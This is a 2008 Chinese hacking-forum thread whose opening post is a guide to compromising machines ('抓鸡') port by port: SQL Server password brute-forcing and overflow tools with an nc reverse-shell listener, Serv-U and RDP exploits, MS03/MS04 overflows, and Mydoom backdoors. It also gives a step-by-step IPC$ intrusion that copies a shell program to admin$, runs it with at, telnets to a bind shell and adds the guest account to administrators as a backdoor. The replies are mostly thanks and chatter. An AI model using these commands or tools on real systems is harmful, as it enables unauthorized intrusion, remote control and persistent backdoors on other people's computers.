找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1746|回复: 8

各个端口抓鸡方法

[复制链接]

1778

主题

5094

回帖

1万

牛毛

论坛管理员

佚名

积分
14675
QQ
发表于 2008-12-27 15:57:39 | 显示全部楼层
來分享一下經驗啦!~~呵呵~

0

主题

10

回帖

16

牛毛

初生牛犊

积分
16
发表于 2008-12-27 16:02:07 | 显示全部楼层 来自 江苏省苏州市
來分享一下經驗啦!~~呵呵

0

主题

10

回帖

16

牛毛

初生牛犊

积分
16
发表于 2008-12-27 16:02:20 | 显示全部楼层 来自 江苏省苏州市
來分享一下經驗啦!~~呵呵

17

主题

249

回帖

359

牛毛

一级牛人

积分
359
QQ
发表于 2008-12-27 16:08:58 | 显示全部楼层 来自 浙江省台州市
没附件。。。。晕倒

27

主题

288

回帖

417

牛毛

一级牛人

积分
417
QQ
发表于 2008-12-27 16:14:02 | 显示全部楼层 来自 广西贵港市
[s:162] 好复杂的样子

12

主题

139

回帖

225

牛毛

一级牛人

积分
225
发表于 2008-12-28 08:10:48 | 显示全部楼层 来自 广东省
感觉好复杂

谢谢楼主分享,顶一下

5

主题

139

回帖

205

牛毛

一级牛人

积分
205
发表于 2009-1-2 21:28:52 | 显示全部楼层 来自 河南省洛阳市涧西区
不懂
教教我吧
好不好
我Q464****3765
教我技术好不好
我穷的很

388

主题

3764

回帖

9049

牛毛

初生牛犊

积分
11492
发表于 2009-1-2 23:14:27 | 显示全部楼层 来自 黑龙江省七台河市
很复杂得呵呵

13

主题

86

回帖

130

牛毛

一级牛人

积分
130
QQ
 楼主| 发表于 2008-12-27 15:45:11 | 显示全部楼层 |阅读模式 来自 陕西省宝鸡市
总结各个端口的入侵
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后
SQLTools.exe入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口
sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433
(这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3.
3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4.
80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
5.
serv-u入侵(21端口)
对5.
004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6.
554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8.
系统漏洞
利用135、445端口,用ms03***26、ms03***39、ms03***49、ms04***11漏洞,
进行溢出入侵。
9.
3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10.
其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
1. C:\\>net use
$\">\\\\127.0.0.1\\IPC$ \"\" /user:\"admintitrators\"

这是用\"流光\"扫到的用户名是administrators,密码为\"空\"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连
接,因为密码为\"空\",所以第一个引号处就不用输入,后面一个双引号里的是用户名
,输入administrators,命令即可成功完成。
  
2.
C:\\>copy srv.exe $\">\\\\127.0.0.1\\admin$

先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的
c:\\winnt\\system32\\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

  
3. C:\\>net time \\\\127.0.0.1

查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
  
4. C:\\>at <A
href=\"file://\\\\127.0.0.1\">\\\\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
  
5. C:\\>net time <A
href=\"file://\\\\127.0.0.1\">\\\\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是
2002/3/19 上午 11:05,那就准备
开始下面的命令。
  
6. C:\\>telnet 127.0.0.1 99

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的
是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打
算建立一个Telnet服务!这就要用到ntlm了
  
7.C:\\>copy
ntlm.exe
$\">\\\\127.0.0.1\\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
  
8.
C:\\WINNT\\system32>ntlm

输入ntlm启动(这里的C:\\WINNT\\system32>指的是对方计算机,运行ntlm其实是让这
个程序在对方计算机上运行)。当出现\"DONE\"的时候,就说明已经启动正常。然后使
用\"net
start telnet\"来开启Telnet服务!
9. Telnet
127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作
一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组

10. C:\\>net user guest /active:yes
将对方的Guest用户激活
11. C:\\>net
user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\\>net localgroup
administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我
们可以用guest再次访问这台计算机)
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-27 18:43 , Processed in 0.217916 second(s), 72 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表